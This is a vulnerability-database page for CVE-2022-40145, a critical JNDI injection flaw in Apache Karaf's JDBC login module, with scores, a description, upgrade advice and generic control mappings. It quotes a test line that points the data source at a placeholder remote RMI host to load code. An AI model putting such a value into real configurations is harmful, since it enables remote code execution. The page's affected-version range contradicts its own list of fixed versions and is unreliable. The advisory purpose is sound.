Cyber Resilience

CVE-2022-40145

Critical

Published: 21 December 2022

Published
21 December 2022
Modified
15 April 2025
KEV Added
Patch
CVSS Score v3.1 9.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Score 0.0539 90.3th percentile
Risk Priority 23 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2022-40145 is a critical-severity Improper Input Validation (CWE-20) vulnerability in Apache Karaf. Its CVSS base score is 9.8 (Critical).

Operationally, ranked in the top 9.7% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.

Deeper analysis

CVE-2022-40145 is an input-validation flaw in Apache Karaf that permits code injection through an attacker-controlled JNDI LDAP URI supplied as a JDBC data-source name. The vulnerable code path is JDBCUtils.doCreateDatasource, which passes the value of the DATASOURCE option directly to InitialContext.lookup without sanitization; the issue affects all releases up to and including Karaf 4.4.1 and 4.3.7.

An unauthenticated remote attacker who can influence the LDAP server referenced by a Karaf JDBCLoginModule configuration can return a malicious JNDI reference, causing the Karaf instance to execute arbitrary code. Successful exploitation yields full confidentiality, integrity, and availability impact, reflected in the CVSS 9.8 score.

The official Apache Karaf advisory directs users to upgrade to 4.4.2 or 4.3.8, which contain the corrected JDBCUtils implementation that rejects unsafe JNDI schemes.

EPSS remains flat at 0.0539 with no material increase after disclosure, and no confirmed in-the-wild exploitation has been reported.

EU & UK References

Vulnerability details

This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to…

more

`options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8

CWE(s)

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

apache
karaf
≤ 4.3.8 · 4.4.0 — 4.4.2

Mitigating Controls

Likely Mitigating Controls AI

Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.

addresses: CWE-20 CWE-74

Security testing and evaluation at multiple SDLC stages directly detects missing or flawed input validation, with the required remediation process ensuring fixes are applied.

addresses: CWE-20

Security testing and developer training directly verify and enforce proper input validation, reducing exploitability of injection and malformed-data weaknesses.

addresses: CWE-20

Directly implements checks on information inputs to reject invalid data before processing.

addresses: CWE-74

Identifies indicators of injection attacks (command, SQL, LDAP, etc.) via anomaly and attack monitoring.

addresses: CWE-20

Spam protection mechanisms perform filtering and detection on inbound/outbound messages, directly compensating for missing or weak input validation of unsolicited content.

References